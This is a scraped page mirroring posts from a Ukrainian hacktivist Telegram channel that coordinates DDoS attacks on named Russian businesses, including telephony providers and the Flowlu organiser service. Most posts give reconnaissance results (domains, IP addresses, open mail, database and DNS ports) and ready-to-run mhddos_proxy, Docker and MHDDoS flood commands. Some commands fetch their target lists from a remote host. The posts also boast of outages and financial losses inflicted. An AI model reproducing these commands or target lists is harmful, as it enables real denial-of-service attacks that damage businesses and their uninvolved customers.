cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

Гайдамаки InfoDDoS-3

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Advertising posts
273Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

Доброго дня, Гайдамаки! Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓 Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче: https://t.me/haydamaki Люблю, цілую — головний адмін❤️
Mostrar todo...
Гайдамаки

Discord Гайдамак:

https://discord.gg/UyqBRprgZt

Чат Гайдамак:

https://t.me/haydamaki_chat

Документація DDoS:

https://t.me/haydamaki/14

Зв'язок з адмінами: @haydamak_bot

Anonymous voting
    0 votes
    Доброго вечора, Гайдамаки! Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁 Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
    Mostrar todo...
    Доброї ночі, гайдамаки!😴 Атака на флоулу була не дуже вдалою, так як там працють люди, які реально розбираються у своїй справі. Порти постійно фільтрували, але "елегантно" — вони відкриті, зі статусом tcpwrapped😓 На ніч, я вирішив дати не великий сервіс, так як вночі зазвичай активу мало — Вотбокс. Це телефонія, яка дає декільком компаніям свої віртуальні апі і звязок через систему CRM. api.votbox.ru www.votbox.ru votbox.ru www.virtualofficetools.ru virtualofficetools.ru telefononline.ru 84.52.103.122 [80/TCP, 443/TCP] [25/STMPd, 110/POP3d, 143/IMAPd, 993/ssl-IMAPd, 995ssl-POP3d] —> поштові канали звязку* mx.virtualofficetools.ru mx.votbox.ru 84.52.103.120 [443/TCP] 31.177.80.41 89.111.166.6 [53/UDP] —> DNS-servers Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS: python3 start.py UDP 31.177.80.41:53 5000 10000 true python3 start.py UDP 89.111.166.6:53 5000 10000 true python3 start.py STRESS http://www.votbox.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS http://www.votbox.ru/cloff.html 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS http://www.votbox.ru/cloffback.html 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS http://telefononline.ru 6 1000 proxy.txt 10000 5000 true Всі ми стомились останнім часом.. Війна все "попаскудила" всім, але не час здаватись, потрібно показати оркам, що вони зробили велику помилку👊
    Mostrar todo...
    Update: 11:07 —> тимчасово використовуємо старі команди, прописані вручну — статичні команди для атак накрились**
    Mostrar todo...
    Доброго ранку, Гайдамаки!⚔️ Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏 Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід" flowlu.ru www.flowlu.ru 178.170.244.102 [21/TCP, 22/TCP, 80/TCP] [25/TCP, 110/TCP, 143/TCP, 465/TCP, 587/TCP, 993/TCP, 995/TCP] —> Dovecot mail-ports (поштові канали звязку)* mx.flowlu.ru 95.213.248.77 —> висить їх БД [22/TCP, 3306/TCP, 9100/TCP, 9998/TCP] legal.flowlu.ru complitech.flowlu.ru artgorka.flowlu.ru acorn.flowlu.ru labx.flowlu.ru hc.flowlu.ru flamingo.flowlu.ru ironplastgroup.flowlu.ru relgroup.flowlu.ru ginoice.flowlu.ru ronavi.flowlu.ru pipe.flowlu.ru my.flowlu.ru trustyhost.flowlu.ru 37.200.70.155 [22/TCP, 25/TCP] DNS-servers: ns1 —> 31.177.80.41 [53/UDP] ns2 —> 89.111.166.6 [53/UDP] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команди для MHDDoS: python3 start.py UDP 31.177.80.41:53 5000 10000 true python3 start.py UDP 89.111.166.6:53 5000 10000 true python3 start.py POST 95.213.248.77:3306 6 1000 proxy.txt 10000 10000 true python3 start.py POST 95.213.248.77:9100 6 1000 proxy.txt 10000 10000 true python3 start.py POST 95.213.248.77:9998 6 1000 proxy.txt 10000 10000 true python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊
    Mostrar todo...
    Доброї ночі, Гайдамаки і Гайдамачки!😁 Вітаємо з Великоднем! Сподіваюсь, що сьогодні ви добре відпочили, так як таргетів не було — рахуйте, що це аванс, так як відпочивати під час війни ми можемо рідко😴 Минула наша атака на сервіси Неофона не була марною. Зараз вони вже стали на ноги, хоча сервіс пів доби лежав мінімум і багато бізнес компаній не мали до нього доступу=втрата грошей. Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід. Далі, буде атака на ще один сервіс з бізнес сектору рашистів, цього разу вже не зовсім телефонія. Ціль вразлива і доволі велика, тому будемо атакувати спільно з іншою ddos-групою😜 Збір о 10 ранку! ВАЖЛИВА ЦІЛЬ!
    Mostrar todo...
    Доброго дня, Гайдамаки!😊 Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️ Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами. Доповнюю основну ціль, результат тримайте нижче. neophones.ru neocomms.ru www.neocomms.ru www.neophones.ru 83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)* wiki.neophones.ru 217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)* MAIL-servers: 217.150.193.196 [110/TCP, 143/TCP, 993/TCP, 995/TCP] 83.166.225.200 [25/TCP] DNS-servers: 217.150.192.194 217.150.193.194 [53/UDP] —> все ще відкриті, атаку по юдп не припиняємо* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table Команди для MHDDoS: python3 start.py UDP 217.150.192.194:53 5000 10000 true python3 start.py UDP 217.150.193.194:53 5000 10000 true python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true
    Mostrar todo...
    Доброго дня, Гайдамаки!🤗 Останні кілька днів ми атакували сервіси войс-конект, і, скажу вам чесно, атака вийшла доволі потужна, тривалістю в кілька діб — це фатально для бізнесу. Зараз їх компанія перейшли на клауд іншої бізнес-компанії, але таку ціль ми вже не подужаємо. В будь-якому випадку це призвело до паніки всіх їх клієнтів і зараз вони понесли великі втрати. Що ж, тоді продовжуємо роботу над бізнес-сервісами окупантів. Потрібно зменшити спонсорування війни рашистів. А також давайте нагадаємо, що ми зробили за останні кілька тижнів😊 Перша хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ТЕЛЕФІН: Ми атакували Телефін. У цьому випадку, наслідками нашої атаки ворогом було витрачено доволі солідну суму грошей на QRATOR-захист. Цей тип захисту доволі ефективний, але також, одночасно з цим, — дууже дорогий😈 Друга хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ГРАВІТЕЛ: Гравітел. Тут ми знищили основні, а також додаткові сервіси телефонії. Сервери не працювали кілька днів. У них був вибір: або втрачати кошти, поки сервіс лежить, або поставити захист, так само, як Телефін. Вони обрали перший варіант. Третя хвиля атак Гайдамаків "Рейди на телефонії рашистів" — КАРАТ: Далі атака на Карат-телефонію та Інсайд-тел. Саме в цей момент ці компанії обєднувались в одну (інтеграція Інсайда в Карат), ми трішки завадили цьому👌 Четверта хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ВОЙС-КОНЕКТ: Найдовша атака була саме на сервіси Войс-конект — 5 днів. Чому так довго? В першу чергу нашим завданням було заставити їх зробити так само як Телефін, а саме витратити кругленьку суму на підтримку свого сервісу. Довго ми чекали, поки будуть хоч якісь дії.. І ось, сьогодні вони перенесли свою БД на клауд. На це вони теж витратили трішки грошенят. Також була безрезультатна атака на Сбербанк (спільно з іншими групами), атака на аеропорт Іркутська, атака на росказну, ну і, звісно, доволі вдала атака Айті армії на системи маркування ЧЗ, в якій ми допомогли їм. Але зараз основний акцент і вектор атак нашого угрупування — це бізнес сектор РФ! Чекайте вказівок. Ціль на ніч✨ Збір — 22.00!!!
    Mostrar todo...
    Увага!!! Зараз прошу всіх максимально атакувати по UDP! Знаю, ви стомились атакувати 2 день підряд один сервіс, але лише точковими ударами, ми можем реально мати вплив на економіку рашистів👌 www.voice-connect.ru voice-connect.ru my.voice-connect.ru billing.voice-connect.ru home.voice-connect.ru 185.248.100.60 [22/TCP, 25/TCP, 111/TCP, 443/TCP] 77.244.214.121 [22/TCP, 25/TCP, 443/TCP] 95.163.87.128 [22/TCP, 1720/TCP, 3306/TCP, 5060/TCP] 195.88.209.73 [22/TCP, 443/TCP, 8080/TCP] 91.217.20.20 194.67.73.81 91.217.21.20 89.104.95.35 193.232.146.1 [53/UDP] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (прошу зараз атакувати саме командою вище)***
    docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
    
    docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
    
    
    Команда для mhddos_proxy:
    python runner.py
    
    -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (прошу зараз атакувати саме командою вище)***
    python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
    
    python runner.py https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
    
    
    Команди для MHDDoS:
    python3 start.py UDP 91.217.20.20:53 5000 10000 true
    python3 start.py UDP 194.67.73.81:53 5000 10000 true
    python3 start.py UDP 91.217.21.20:53 5000 10000 true
    python3 start.py UDP 89.104.95.35:53 5000 10000 true
    python3 start.py UDP 193.232.146.1:53 5000 10000 true
    
    (вище пріорітетні зараз команди)***
    python3 start.py POST 95.163.87.128:3306 6 1000 proxy.txt 10000 10000 true
    
    python3 start.py STRESS https://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
    python3 start.py STRESS http://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
    python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
    
    
    Приходиться часто корегувати ціль, а це значить, що вони постійно стараються обходити наші атаки — тобто ми все правильно робимо, продовжуємо, поки не ляжуть повністю😉
    Mostrar todo...